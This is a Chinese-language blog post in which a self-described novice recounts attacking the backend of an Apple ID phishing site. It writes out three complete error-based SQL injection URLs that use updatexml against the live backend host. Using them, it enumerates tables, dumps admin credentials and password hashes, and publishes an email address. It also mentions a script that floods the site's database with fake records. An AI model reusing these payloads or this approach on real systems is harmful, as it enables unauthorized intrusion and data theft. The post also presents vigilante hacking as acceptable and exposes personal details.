菜鳥攻入Apple ID釣魚網站實錄

下午，朋友發了一條朋友圈，內容大概這樣：

大體就是她的iPhone丟了，收到了釣魚簡訊，多麼熟悉的套路，如下：

還好她比較機智，發現是個釣魚網站，地址如下：

http://www.apple-icloudid.com.cn

當時看到這件事後，想到之前有巨巨順勢搞定釣魚網站，所以我也想小試牛刀一下，看看能否攻入釣魚網站後台。

在試了幾輪PHP常見後台地址後，比如/admin,/index.php/admin，均未奏效，索性開始對網站抓包，抓包過程中有了意外收穫，得到了另一個實際的核心站點信息。

原來在apple-icloudid.com.cn下的一切請求實際都是由http://www.ht888.pw這個站點來處理的，包括管理後台。

這個站點設計的極為簡陋，所以三下五除二就順利找到了管理後台地址：http://www.ht888.pw/admin/

然而竟然同時發現了另外一個管理後台：http://www.ht888.pw/new/admin/

頁面上寫著「低調做人，高調做事」，這是個什麼鬼！！！

下面對這兩個站點抓包的過程中，十分幸運的是，發現了一個SQL注入漏洞：

簡單的API調用居然把執行的SQL語句返回了！！！這麼嚴重的漏洞，我不利用誰利用。

不過讓我驚訝的是，管理後台的登錄框有對SQL注入做了處理，所以我只能從這個API調用來進行SQL注入。

對了，我是SQL注入小白，通過網上現找和朋友給的一點MySQL資料，使用Postman實現了簡單的攻擊。

第一波先獲取資料庫表信息

http://www.ht888.pw/new/mbsave.php?sid=8vosio1728r8uvvmb6bidlktf6&step=2&username=2142342@qq.com&password=Olivia" or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or "

得到10張表名，分別是ap_admin， ap_members， ap_sites， ap_userlog， yu_admin， yu_guest， yu_members， yu_mibao， yu_sites， yu_userlog。

其中yu_mibao這張表裡存儲著受害人的iCloud賬號信息，ap_admin和yu_admin兩張表裡存了管理員賬號。

第二波獲取管理員表結構

http://www.ht888.pw/new/mbsave.php?sid=8vosio1728r8uvvmb6bidlktf6&step=2&username=2142342@qq.com&password=Olivia" or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name="yu_admin" limit 0,1)),0) or "

其中ap_admin和yu_admin表欄位一致，分別為userid， gid， username， password， email， logintime， loginip， logincount。兩張表裡各有一條管理員賬號記錄

ap_members和yu_members表欄位一致，分別為uid， email， password， regip， address， site。

其他表還沒有查看，方法類似。

第三波獲取表數據

http://www.ht888.pw/new/mbsave.php?sid=8vosio1728r8uvvmb6bidlktf6&step=2&username=2142342@qq.com&password=Olivia" or updatexml(0,concat(0x7e,(SELECT concat_ws(":", username, password, email, logintime, loginip, logincount) FROM yu_admin limit 0,1)),0) or "

這裡我們從ap_admin表獲得一個管理員賬號，賬戶名為apple，密碼為加密後內容0659c7992e268962384eb17，暫時未能破解。

從yu_admin表中獲得另一個管理員賬號，賬戶名為apple,密碼同樣為加密內容5a50131eb6f2d7b652ae459b4，同樣暫時未破解。

到了這裡基本就可只差密碼的破解的，後續的步驟是試著刪除掉該釣魚站點所有受害人信息。

寫在最後

公布下目前找到的有關釣魚網站的信息

以及通過API漏洞獲得的QQ郵箱一個：1485882247@qq.com

以上就是本次整個攻擊過程，當然因為我是菜鳥，所以很多要點處理的應該都不太好。釣魚網站這個套路屢見不鮮，對方往往打一槍換一個地方，禍害了不知多少普通用戶。手機丟了還好，可怕的是iCloud里的隱私數據，往往會帶來難以想像的傷害。

最後，就醬。

#4月7日更新

目前寫了個小程序，不停往對方資料庫寫入假數據^_^

剛看到@林肖恩的新進展Apple ID釣魚網站後台一覽 - 知乎專欄

釣魚網站後台已被破掉，受害者信息已清空。贊！！！

已將相關網站舉報到12321網路不良與垃圾信息舉報受理中心

推薦閱讀：